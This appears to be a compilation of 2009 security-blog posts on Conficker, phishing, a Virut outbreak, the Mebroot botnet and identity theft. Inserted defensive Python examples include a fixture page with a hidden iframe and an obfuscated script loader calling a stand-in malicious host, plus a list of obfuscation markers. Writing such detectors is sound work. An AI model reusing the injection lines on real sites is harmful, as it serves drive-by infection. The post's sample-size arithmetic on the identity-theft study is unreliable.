Conficker: 1 Year Later, 7 Million Infected

"'The only thing I can guess at is the person who created this is scared,' said Eric Sites, chief technology officer with Sunbelt Software and a member of the working group.

"'This thing has cost so many companies and people money to get fixed, if they ever find the guys who did this, they're going away for a long time.'"

This from a Network World write-up on Conficker, 1 year later.

What a lot of folks find perhaps most interesting about Conficker is,

"Despite its size, Conficker has rarely been used by the criminals who control it.

"Why it hasn't been used more is a bit of a mystery.

"Some members of the Conficker Working Group believe that Conficker's author may be reluctant to attract more attention, given the worm's overwhelming success at infecting computers."

Regardless of whether or not it has been used a lot 'til now, the fact of the matter is that the Conficker Working Group estimates 7 million PCs have been infected thus far with variants A and B of the worm.

Another thing that caught our eye is that the worm is apparently very (perhaps most?) common in China and Brazil; the Network World piece (although we could not confirm this) cites the Conficker Working Group as,

"suspect[ing] that many of the infected PCs are running bootlegged copies of Microsoft Windows, and are therefore unable to download the patches or Microsoft's Malicious Software Removal Tool, which could remove the infection."

This policy of Microsoft's is definitely a subject of some debate.

Clearly, and regrettably, a lot of people pirate Microsoft's software; but by refusing to let the pirates update their copies of Windows (or download the Malicious Software Removal Tool), Microsoft in effect punishes everyone else by helping the worm perpetuate itself. That really doesn't make sense.

Microsoft's belief, no doubt, is that if pirates can't use their computers because of the worms, they'll wise-up and buy legitimate copies of Windows.

I doubt it.

If a computer is infected, the solution for the pirate is most often just to re-install the OS from scratch if needed and to take other steps (e.g. installing antivirus software) to prevent re-infection. Others just think their computers are slow and don't know why, or ignore the worm altogether and go on about their day.

Whatever the case in the mean time though, by preventing updates, Microsoft's policy allows Conficker to spread, grow, and perpetuate.


Firefox Blocking Microsoft .NET Plugin/Add-on

There was a lot of noise starting back in February 2009 when Microsoft began pushing out a secret .NET plugin/add-on to Mozilla Firefox.

Among other problems, Microsoft was installing the plugin into Firefox any time you did a Windows update.

The complaints about this plugin were:
  1. There was no notification of the update.
  2. There was no practical way to prevent the update.
  3. Disabling the plugin was a supreme headache.
  4. Firefox isn't even a Microsoft product!

The good news about this is that Mozilla Firefox developers are now blocking the .NET plugin.

Given the list of problems cited above with this plugin, it's no wonder Mozilla devs moved to block the add-on.

We're not alone in wishing it had happened sooner; regardless, we're glad they have.

Sure, Microsoft has every right to make a .NET plugin for Firefox. The problem is/was that they weren't giving users any notice that the plugin was being installed.

They just did it.

Oh, and good luck getting it disabled once it's in there.

If Microsoft wants to make the download available as an optional installation AND make it possible to easily disable the plugin, that's fine.

What they did though is unacceptable, as it was nigh impossible for most users to disable. If a security issue had arisen with it for which Microsoft, as they do from time to time, declined to issue a patch (or was slow to issue one), users would have been hard pressed to disable the plugin to mitigate the risk.

Whoever at Microsoft was responsible for making this plugin work the way it did could have had a few reasons for doing so. Here is Microsoft's possible reasoning, and why that reasoning was unsound:

  1. Microsoft's possible reasoning: give everyone a similar experience in Firefox to the one they would have with Internet Explorer.
     Why it was unsound: fine, but just give users the choice to opt out easily, and give them the chance to easily disable the add-on at any time after installation if they don't like or want it.
  2. Microsoft's possible reasoning: making it optional confuses too many people.
     Why it was unsound: if you're confused about what it is or how it works, how do you expect anyone to know what they're missing by not having the .NET add-on?
  3. Microsoft's possible reasoning: making it difficult to remove makes it hard for people to miss out on the experience.
     Why it was unsound: what if there's a security issue? What if there's a stability issue? What if I just don't want it? How can anyone minimize the security risk or test for stability issues if it's so difficult to remove?
  4. Microsoft's possible reasoning: making it difficult to remove lets Microsoft extend its reach into Firefox.
     Why it was unsound: why create more browser-related problems for Microsoft, which already has plenty of issues to contend with in the antitrust arena?

How would users feel if Microsoft suddenly started changing settings or adding "features" to something like Internet security software, without notifying users they were doing it, without giving users a chance to opt out, and without users having a way to easily undo what Microsoft had done?

While not exactly Internet security software, per se, Firefox is installed by users because in many ways it does provide greater security than Internet Explorer.

No matter how you look at it, the way Microsoft chose to install the plugin, essentially injecting its own code into another company's product, without users' knowledge or consent, was unwise at best and while not exactly malicious, almost certainly not on the up-and-up.

I'm just glad Mozilla finally disabled the .NET add-on.

If you haven't updated your Firefox (or haven't yet tried it), you can download Firefox--the latest version, of course--and get the .NET plug-in disabled.


Conficker Still Active

Back in March 2009 the worm Conficker gained notoriety for its countdown-to-activation.

We covered Conficker and removing Conficker quite extensively before and after the launch date, and now about six months later, it unfortunately comes as no surprise that systems are still being infected by it.

In fact, Kaspersky Antivirus, which publishes top-malware statistics every month, in September 2009 still had Conficker in its various forms (called 'Net-Worm.Win32.Kido' by Kaspersky) occupying three of the top 20 malware spots.

The folks at Viruslist.com, who (along with a ton of other things) report on Kaspersky's malware statistics, go on to point out that, "Kido (Conficker) remains active. Kido.ih, the leader of this Top Twenty for the last six months, has been joined by another variant, Kido.ir, which is a newcomer to the rankings."

Removing Conficker isn't easy and many antivirus software vendors had a tough time getting a handle on how to remove the worm from infected PCs, but as far as we know every major antivirus program today is now capable of stopping and removing Conficker/Kido.

This is part of the reason, no doubt, why the authors of Conficker continue to write new versions: to try to thwart the A/V programs from stopping and removing their worm.

Regardless of whether or not your PC has been infected, make no mistake: just because it has been six months since Conficker's activation date, it's still a real threat, and if your PC is unpatched, all you have to do is be connected to a network (or the Internet) where there are other infected machines for yours to be at risk of infection, too.

This threat is all but eliminated if you're running any of the best firewall antivirus software or Internet security suites.

Lastly, as a reminder, do make sure your PC has the latest patches. It typically takes just a few minutes to apply the patches, and after a reboot (sometimes two!) you're in business.

Prior coverage of Conficker


Largest Phishing Ring Busted by FBI

Exciting news today in the fight against phishing: the FBI has charged over 100 people in what the Director is calling, "the largest international phishing case ever conducted."

There are some interesting details of this phishing ring bust including:

  1. U.S. financial institutions were targeted
  2. Involved criminals in the U.S. and Egypt
      53 charged in the U.S.
      47 charged in Egypt
  3. Hundreds, possibly thousands of accounts were affected
  4. Approximately $1,500,000 stolen from affected accounts

Phishing is a particularly nasty crime because of the indiscriminate way it targets its victims and because the crime often goes unnoticed for lengthy periods of time.

Imagine you get an email warning you that there's something wrong with your bank account or credit card. The email looks, sounds, and feels just like the real emails from your bank.

You click a link in it, and you're on your bank's website (or so you think...)

Sometimes, these phishing sites really do completely mimic the bank, so that the next thing you know, this site that looks so much like your bank has confirmed your details and is apologizing for the inconvenience and thanking you for your time.

Huh. That's it, and you go on with your day.

Just that fast, someone has your banking information and has transferred money out of it or purchased something on your credit card. Heck, maybe they even opened up a credit card or two in your name.
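Added example, ours rather than the post's or the FBI case's: a small Python checker for the link lure described above, run over a constructed HTML e-mail body written in the style of a fake bank notice. It assumes the customer's real bank domain is examplebank.com (a made-up name) and flags links whose visible text shows one site while the href goes to another, whose target is a bare IP address, or where the bank's domain appears only as a subdomain of some other registered domain. The registered-domain logic is deliberately crude (last two labels), which is enough for .com-style names but not for country-code suffixes such as .co.uk.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Registered domain the customer actually banks with (assumption, made up for this example).
EXPECTED_DOMAIN = "examplebank.com"

# Constructed HTML e-mail body written in the style of a fake bank notice (not a real message).
SAMPLE_EMAIL_HTML = """
<p>Dear customer, we noticed unusual activity on your account.</p>
<p>Please <a href="http://192.0.2.10/login">sign in</a> to confirm your details, or visit
<a href="https://examplebank.com.account-verify.example/">https://www.examplebank.com/</a>.</p>
<p>Statements are still available at <a href="https://www.examplebank.com/statements">our site</a>.</p>
"""

ANCHOR_RE = re.compile(r'<a\s[^>]*?href=["\']([^"\']+)["\'][^>]*>(.*?)</a>', re.I | re.S)
TAG_RE = re.compile(r"<[^>]+>")
LOOKS_LIKE_DOMAIN = re.compile(r"[\w.-]+\.[a-z]{2,}(/\S*)?", re.I)


def registered_domain(host):
    """Crude registered-domain extraction: last two labels (fine for .com-style TLDs)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_link(href, text, expected=EXPECTED_DOMAIN):
    """Return a list of human-readable reasons this link looks like a phishing lure."""
    findings = []
    parsed = urlparse(href)
    host = (parsed.hostname or "").lower()
    if parsed.scheme == "http":
        findings.append("target is not https")
    if is_ip(host):
        findings.append("target host is a bare IP address")
    elif host and registered_domain(host) != expected:
        if expected in host:
            findings.append("expected domain appears only as a subdomain of " + registered_domain(host))
        else:
            findings.append("target domain %s is not %s" % (registered_domain(host), expected))
    # The classic lure: the visible text shows the real bank address, the href goes elsewhere.
    visible = TAG_RE.sub("", text).strip()
    if "://" in visible or LOOKS_LIKE_DOMAIN.fullmatch(visible):
        shown = (urlparse(visible if "://" in visible else "https://" + visible).hostname or "").lower()
        if shown and registered_domain(shown) != registered_domain(host):
            findings.append("link text shows %s but target is %s" % (shown, host))
    return findings


def scan_email(html, expected=EXPECTED_DOMAIN):
    """Return [(href, findings)] for every link in the message that raised at least one flag."""
    report = []
    for href, text in ANCHOR_RE.findall(html):
        findings = analyse_link(href, text, expected)
        if findings:
            report.append((href, findings))
    return report


if __name__ == "__main__":
    for href, findings in scan_email(SAMPLE_EMAIL_HTML):
        print(href)
        for f in findings:
            print("  -", f)
```

On the sample message the two lure links are flagged and the genuine statements link passes; the same function can be pointed at any fetched message body, with the expected domain set per institution.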

Whatever the case, when it comes to phishing there is good software today that, while not perfect, does help make the risk of being snagged by a phishing attack quite a bit lower.

The first place to start is with antivirus firewall software or an Internet security suite. There's no question that no software is completely foolproof; however, compared to the cost in time, money, and heartache of repairing your credit and getting your good name restored, the sticker price of even the priciest security software is really very, very low.

As for the cybercriminals in the U.S., they've been charged with:

  1. conspiracy to commit bank fraud
  2. computer fraud
  3. money laundering
  4. aggravated identity theft

Sounds like the FBI is throwing the book at 'em. And rightly so. According to the article, the bank fraud charge alone could lead to jail sentences of 20 years.

While that won't help restore the victims' good names or help them get their money back, at least the criminals are likely to be locked up for a long, long time.


Computer Virus Threatens Power Grid in Australia

Just a few days into October and already there's news of a computer virus attack that's,

"...wreaking havoc with Integral Energy's computer network, forcing it to rebuild all 1000 of its desktop computers before the 'particularly sinister' bug spreads to the machines controlling the power grid."


We learned of this from the Sydney Morning Herald, one of Australia's most highly regarded daily newspapers.

The article quotes an Integral Energy spokesman as saying they had to "rebuild all desktop computers to contain and remove the virus."

Double yuck.

Now, if you're like me, one of the first questions you'll likely ask is, "Didn't they have antivirus software installed?"

Well, according to the article, yes. In fact:

"Integral Energy said the virus was the W32.Virut.CF strain, which computer security company Symantec describes on its website as 'a particularly sinister file infector' that spreads quickly and 'is proving difficult to remove from infected networks'.

"Ironically, Integral Energy's computer networks are protected by a Symantec security solution, a source said. Symantec has had a virus signature for W32.Virut.CF since February."

[Editor's note: Symantec is perhaps best known for their A/V software Norton Antivirus.]

This brings up the next question: how did the virus evade detection by the antivirus security software? Although I don't have evidence of this, corporations typically don't run the consumer version of software but so-called "corporate" editions, which commonly have advanced heuristics and central management consoles for managing all the desktops from one location.

In many cases, when antivirus firewall software is installed into a corporate environment, the software may even be the Internet security suite version of a particular product.

Given that they were probably running business antivirus software, I'm even more puzzled how it went undetected. Was this really a case where:

  1. the antivirus software failed
  2. human error allowed it to go unnoticed
  3. an insider intentionally set the virus loose on the network
  4. some combination of the above

We'll be following this story closely to see what develops. Hopefully, more light will be shed on this outbreak so we can help our business and home users alike prevent such a PC virus from hitting their computers.


Computer Security Researchers Take Control of a Botnet

We got wind today of a research project out of the University of California Santa Barbara (UCSB) that took over one of the most notorious botnets, Mebroot.

In an article on the takeover of the Mebroot botnet, the scope of the Mebroot problem is revealed: They found more than 6,500 websites hosting malicious code that redirected nearly 340,000 visitors to malicious sites.

Mebroot gained notoriety for taking over legitimate web sites and infecting those sites with malicious JavaScript code.

The idea behind such an attack was to give the cybercriminal botnet operators a massively distributed network for attacking the PCs of visitors to a range of legitimate websites; that makes the operation much, much harder to stop and a much, much more stable source of end users' PCs to do their real bidding: cybercrime.

"'Once upon a time, you thought that if you did not browse porn, you would be safe,' says Giovanni Vigna, a UCSB professor of computer science and one of the paper's authors.

"'But staying away from the seedy places on the Internet is no longer an assurance of staying safe.'"

So the botnet worked like this:

  1. Take over legitimate websites
  2. Infect these legitimate websites with hidden malicious JavaScript that redirects visitors going to the legitimate sites to illegitimate websites, where
  3. End users' PCs are then infected via a drive-by download that silently takes over the visitor's computer
  4. Use these end users' infected PCs to perform their cybercrimes (e.g. credit card theft, password theft, bank fraud, identity theft, etc.)
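Added example, not from the post or the UCSB paper: a Python scanner for the kind of injected content step 2 describes, run over a constructed page (the domain names, file names and script text are made up for this example). It assumes the site's own domain is example.org and reports three things a site owner would want to review: iframes hidden by style or by a 0/1-pixel size, inline scripts that use the common obfuscation calls injected droppers lean on, and script tags loaded from a host other than the site's own. Off-site scripts are often legitimate (a CDN, for instance), so that finding is a lead rather than a verdict.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page: ordinary content with an injected hidden iframe and an
# obfuscated inline script added, in the style the post describes (all names made up).
SAMPLE_PAGE = """<html><head><title>Example Org - Home</title>
<script src="/js/site.js"></script>
</head><body>
<h1>Welcome</h1>
<p>Our regular content.</p>
<iframe src="http://malicious.example/in.php" width="1" height="1" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://malicious.example/x.js%22%3E%3C/script%3E'))</script>
<script src="https://cdn.example.net/lib.js"></script>
</body></html>
"""

# Calls that benign page scripts rarely need but injected droppers use to hide a payload.
OBFUSCATION_MARKERS = ("unescape(", "String.fromCharCode", "eval(", "document.write(")


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while the page is parsed."""

    def __init__(self, site_domain):
        super().__init__()
        self.site_domain = site_domain.lower()  # assumption: the site's own domain
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def _is_own_host(self, host):
        return host == self.site_domain or host.endswith("." + self.site_domain)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if "display:none" in style or "visibility:hidden" in style or tiny:
                self.findings.append(("hidden iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host and not self._is_own_host(host):
                self.findings.append(("off-site script", a["src"]))

    def handle_data(self, data):
        # HTMLParser hands script bodies over as raw data; buffer them until the end tag.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._script_buf)
            self._script_buf = []
            hits = [m for m in OBFUSCATION_MARKERS if m in body]
            if hits:
                self.findings.append(("obfuscated inline script", ", ".join(hits)))


def scan_page(html, site_domain):
    """Return the list of (kind, detail) findings for one page."""
    scanner = InjectionScanner(site_domain)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, "example.org"):
        print(f"{kind}: {detail}")
```

Run against a site's own pages on a schedule, a change in this report between two crawls is exactly the signal the defaced sites in the article were missing: the injected content is invisible to a visitor but not to the parser.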

The article closes with this not-so-surprising detail:

"The researchers also discovered that nearly 70 percent of those redirected by Mebroot--as classified by Internet address--were vulnerable to one of almost 40 vulnerabilities regularly used by the most popular infection toolkits designed to compromise computer systems.

"About half that number were vulnerable to the six specific vulnerabilities used by the Mebroot toolkit.

"The research suggests that users need to update more often, says UCSB's Vigna.

"'Patches are very good at reducing the exposure of the end users, but users are not very good at updating their system,' he says."

The notion of patching more frequently is one we've covered in our site numerous times, and it's a message that warrants repeating regularly.

Why computer users, whether or not they're running the latest antivirus firewall software, don't do so is puzzling.

Updating your OS is an extremely simple process and is well worth the few minutes of time it takes in most cases. (Even when it takes longer, it's still worth it compared to the consequences of not doing so and having your computer be more susceptible to takeover.)

Here's how:

  1. Open Internet Explorer
  2. Click 'Tools' in the upper menu
  3. Click 'Windows Update'
  4. Click Express Update (or Custom Update to get full details on what you're updating)
  5. Install any updates that Microsoft recommends

Typically, you'll have to reboot after this. Then do it again: some updates cannot be installed concurrently with others, so sometimes a couple of update cycles are needed.


Antivirus Software's Role in Preventing Identity Theft

I came across an interesting piece on identity theft by Andrew Patrick today.

In his blog on identity theft, he quotes a study on identity theft by Copes, H., and Vieraitis, L.M. (2009)[1] which claims,

"Despite public perceptions of identity theft being a high-tech, computer driven crime, it is rather mundane and requires few technical skills.

"Identity thieves do not need to know how to hack into large, secure databases. They can simply dig through garbage or pay insiders for information.

"No particular group has a monopoly on the skills needed to be a capable identity thief."

Andrew also points out in his blog that,

"They were able to find 297 inmates, from which they sampled 59 inmates in 14 prisons across the country.

"The convicts agreed to do detailed interviews, in private, to talk about themselves and their crimes, and the results are reported in a recent issue of Criminal Justice Review."

There are a couple of things that are worth pointing out about this study:
  1. 297 inmates is a very small sample set that is hardly statistically significant by most any measure.

    According to the FTC's report on identity theft [.pdf], since the FTC began the Consumer Sentinel Network (CSN) in 1997 through December 2008, there were more than 7.2 million complaints of identity theft.

    Let's see: 7,200,000 - 297 = 7,199,703

    Sorry, but 297 is just too small of a sample size.
    1. That's just in the U.S.
    2. That only includes complaints filed with the FTC, not cases where the consumer took action but didn't file a complaint with the FTC.
    3. That does not include cases where the consumer never noticed the theft.
  2. The 297 inmates were the ones that were caught.

    It's worth considering that perhaps they weren't technology-based identity thieves; rather, committing their crimes in the real world is what led them to be caught in the first place.

    Put another way: if they'd been in Indiana stealing someone's identity in California, they would never have been caught, as were the identity thieves who were caught in JC Penney's trying to use (ironically enough) JC Penney employee Michelle McCambridge's identity.
  3. As pointed out by the Internet Danger Report, the identity thieves who never get caught are the professionals who deal in identities on a wholesale basis.

My point here is that while a large portion of identity theft is definitely committed in the real world, as individuals and organizations involved in computer, information, and personal security, it's disingenuous if not naive of us to lead consumers to believe there is no threat to them online.

That's just not true.

What is true is that identity theft sucks. Clearly.

It's smart to always shred any documents that might have some of your personal information, no matter how seemingly insignificant, before disposing of them.

Installing and running firewall antivirus software is, like shredding your paper files, definitely a best-practice to keep your identity safe from the crackers, identity thieves, and other cyber criminals who want to steal from you.

Furthermore, there's little question that the threats online are real and that there are steps we can all take to keep these threats at bay and keep ourselves safe online.

That said, ignoring the threat and treating it like it's a problem somehow not related to the Internet is really illogical.

If there are simple steps for PC protection, why not take them?

[1] Copes, H., and Vieraitis, L.M. (2009). Understanding identity theft: Offenders' accounts of their lives and crimes. Criminal Justice Review, 34(3), 329-349.